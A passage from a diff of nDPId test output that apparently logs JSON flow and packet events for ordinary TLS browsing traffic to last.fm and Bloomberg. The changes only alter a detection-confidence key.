00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1646482802726,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482802726,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8b+kAAHkGetkjyXCIwKgBgAG7uBJNy0p52hKBtKAS\/\/9IWQAAAgQFlgQCCArHroD1wGTyVwEDAwg="} 01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1646482802732,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482802732,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5g6xAAEAGXpnAqAGAI8lwiLgSAbvaEoG0TctKeoAYAfa\/ZwAAAQEICsBk8mLHroD1FgMBAgABAAH8AwM6s1cKgDvTG3LALyk7fAmvRJX9DNZN37XWMNl1\/SdHaCCUR56oKGM2UcODstsWkptKjiMgLAJPLuO56cI3NFuiCgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA1rZXJ2ZS5sYXN0LmZtABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIEXwFTh8NFdQPbVwjRz3qZyMML4Z+FJITLECgKzAH2YhABcAQQROHWQ9TZ\/FNyVoueylOLPpt31B2wF8YuKZg+41\/WG\/Ucaum9xuzZgJXugnVJqsHgtbN0plSfDPGhyRi1GNW\/CAACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482802720,"flow_last_seen":1646482802732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482802732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"kerve.last.fm","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00928{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482802720,"flow_last_seen":1646482802742,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646482802742,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.3","client_requested_server_name":"kerve.last.fm","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482802720,"flow_last_seen":1646482802732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482802732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"kerve.last.fm","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00928{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482802720,"flow_last_seen":1646482802742,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646482802742,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.3","client_requested_server_name":"kerve.last.fm","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482825245,"flow_last_seen":1646482825245,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482825245,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"69.191.252.15","src_port":39036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1646482825245,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482825245,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8fBNAAEAGurHAqAGARb\/8D5h8AFDXP+M5AAAAAKAC+vDCpAAAAgQFtAQCCArIaWrDAAAAAAEDAwc="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"sites.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1646482826257,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482826257,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8fBRAAEAGurDAqAGARb\/8D5h8AFDXP+M5AAAAAKAC+vC+sAAAAgQFtAQCCArIaW63AAAAAAEDAwc="} @@ -166,46 +166,46 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1646482844787,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482844787,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8DedAAEAGEf7AqAGAl2XBSamUAbtMTKsLAAAAAKAC+vDPdgAAAgQFtAQCCApUsmtnAAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1646482844795,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482844795,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGJuWXZcFJwKgBgAG7qZRSHsTXTEyrDKAS\/\/9OHAAAAgQFTAQCCAoo5zzDVLJrZwEDAwk="} 01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1646482844798,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482844798,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5DelAAEAGD\/\/AqAGAl2XBSamUAbtMTKsMUh7E2IAYAfYA+gAAAQEIClSya3Io5zzDFgMBAgABAAH8AwORBDzSmJ5ztCo20SFZ11gW0AoQQ4sgaFZaA3Y+KP\/wXyDr7yv9lTOmWoS6i6wF3DRKGiQ0dwIiiuA6PbPxGRgIZwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABF3d3cuYmxvb21iZXJnLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACDquIWld0x6v\/7S4zdZ49LOkRXJqmmpTXYEodSal6cCHwAXAEEEAIPYMeBzwG1ajydlfuoJM30LuOrUqddbx+YHyLZsEMUExIIuEeju0UTUsS5CFNGsqSGbD968lENk0xLpNURtmQArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482844787,"flow_last_seen":1646482844798,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482844798,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482844787,"flow_last_seen":1646482844815,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482844815,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01825{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":399,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482844787,"flow_last_seen":1646482844815,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1646482844815,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","server_names":"www.bloomberg.com,api.businessweek.com,api.bwbx.io,assets.bwbx.io,byzantium.bloomberg.com,cdn-mobapi.bloomberg.com,cdn-videos.bloomberg.com,cdn.gotraffic.net,charts.bloomberg.com,embeds.bloomberg.com,fastly.bloomberg.tv,feeds.bloomberg.com,fonts.gotraffic.net,staging-assets.bwbx.io,nav.bloomberg.com,sponsored.bloomberg.com,spotlight.bloomberg.com,tictoc.video,www.bbthat.com,www.bloomberg.co.jp,www.bloomberg.co.jp.shared.bloomberga.com,www.bloomberg.com.shared.bloomberga.com,www.bloombergview.com,www.citylab.com,www.citylab.com.shared.bloomberga.com,www.quicktake.video,www.tictoc.video,cdn-api.cmobile.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=New York, L=New York, O=Bloomberg LP, CN=www.bloomberg.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"88:4A:85:34:1D:E6:C0:BE:5E:C6:14:BB:BA:94:A3:55:92:BA:95:82"}} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":396,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482844787,"flow_last_seen":1646482844798,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482844798,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482844787,"flow_last_seen":1646482844815,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482844815,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01825{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":399,"source":"sites.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482844787,"flow_last_seen":1646482844815,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4537,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1646482844815,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.193.73","src_port":43412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.bloomberg.com","server_names":"www.bloomberg.com,api.businessweek.com,api.bwbx.io,assets.bwbx.io,byzantium.bloomberg.com,cdn-mobapi.bloomberg.com,cdn-videos.bloomberg.com,cdn.gotraffic.net,charts.bloomberg.com,embeds.bloomberg.com,fastly.bloomberg.tv,feeds.bloomberg.com,fonts.gotraffic.net,staging-assets.bwbx.io,nav.bloomberg.com,sponsored.bloomberg.com,spotlight.bloomberg.com,tictoc.video,www.bbthat.com,www.bloomberg.co.jp,www.bloomberg.co.jp.shared.bloomberga.com,www.bloomberg.com.shared.bloomberga.com,www.bloombergview.com,www.citylab.com,www.citylab.com.shared.bloomberga.com,www.quicktake.video,www.tictoc.video,cdn-api.cmobile.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=New York, L=New York, O=Bloomberg LP, CN=www.bloomberg.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"88:4A:85:34:1D:E6:C0:BE:5E:C6:14:BB:BA:94:A3:55:92:BA:95:82"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482845216,"flow_last_seen":1646482845216,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482845216,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1646482845216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482845216,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ZOJAAEAG1L\/AqAGAbIvSZt62AbvYtDuvAAAAAKAC+vDuhAAAAgQFtAQCCAq3z7DKAAAAAAEDAwc="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1646482845236,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482845236,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8MSYAAPgGkHtsi9JmwKgBgAG73rYdOl\/82LQ7sKAS\/\/9A+gAAAgQFoAQCCAoefQzKt8+wygEDAwg="} 01166{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1646482845241,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482845241,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5ZORAAEAG0sDAqAGAbIvSZt62AbvYtDuwHTpf\/YAYAfbCEAAAAQEICrfPsOMefQzKFgMBAgABAAH8AwNDaq9+o2\/m1P9XaJsuL18rMu\/cbIc9LrPA5zUbsuvbziCdB7Y010YsAP9WvlmHthVAcmE9qTBtm04O9SpF9+K9iwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAhAB8AABxzb3VyY2Vwb2ludGNtcC5ibG9vbWJlcmcuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIFWzj0ex9WIWXeCl2qveVdo+cRB1gHroBn+mOFydyRUDABcAQQTZ7Kd3Dh15jhsRvRpWp2w5A6ZrOrpRgthYeTOHm9lBNbC7SyMy7sz4nAvG5eX8+75Yb0V9pFtY29+UzxdUbzEpACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAHoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482845216,"flow_last_seen":1646482845241,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482845241,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sourcepointcmp.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":406,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482845216,"flow_last_seen":1646482845260,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482845260,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sourcepointcmp.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482845216,"flow_last_seen":1646482845241,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482845241,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sourcepointcmp.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":406,"source":"sites.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482845216,"flow_last_seen":1646482845260,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482845260,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.139.210.102","src_port":57014,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Bloomberg","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sourcepointcmp.bloomberg.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":408,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482860064,"flow_last_seen":1646482860064,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482860064,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.14","src_port":48654,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1646482860064,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482860064,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8zthAAEAGckLAqAGADWsqDr4OAbv2xGogAAAAAKAC+vA6VgAAAgQFtAQCCArF2TKPAAAAAAEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"sites.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1646482860089,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482860089,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0KdNAAHUG4k8NayoOwKgBgAG7vg7o0cSg9sRqIYAS\/\/+nUAAAAgQFoAEDAwgBAQQC"} 